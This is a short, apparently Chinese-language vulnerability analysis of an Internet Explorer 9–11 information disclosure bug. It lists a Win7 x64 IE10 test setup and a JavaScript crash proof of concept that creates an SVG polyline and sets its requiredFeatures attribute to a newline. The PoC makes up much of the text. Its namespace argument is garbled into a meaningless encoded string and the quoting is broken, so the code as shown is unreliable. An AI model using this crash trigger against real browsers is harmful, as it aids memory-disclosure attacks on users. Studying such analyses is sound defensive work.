Microsoft Internet Explorer 9 through 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability."
0x01 漏洞成因
测试环境:win7 x64
IE10 10.0.9200.16521
漏洞crash POC如下
function trigger() {
var polyLine = document.createElementNS('d0bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4M7K6i4K6u0W2L8%4u0Y4i4K6u0r3x3U0l9H3x3q4)9J5c8Y4y4$3k6#2)9J5y4#2)9J5b7H3`.`. 'polyline');
polyLine.setAttributeNS(null, 'requiredFeatures', '\n');
}